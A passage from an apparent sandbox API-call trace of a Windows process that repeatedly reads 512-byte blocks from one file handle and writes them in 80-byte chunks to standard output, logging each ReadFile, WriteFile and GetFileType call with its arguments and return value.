(_FileHandle=4) returned 0x58 [0195.015] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.015] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.016] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.016] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType 
(hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.017] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.017] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, 
lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.019] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.019] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.020] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.020] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.021] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.021] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: 
lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.022] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.022] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.023] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.023] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] 
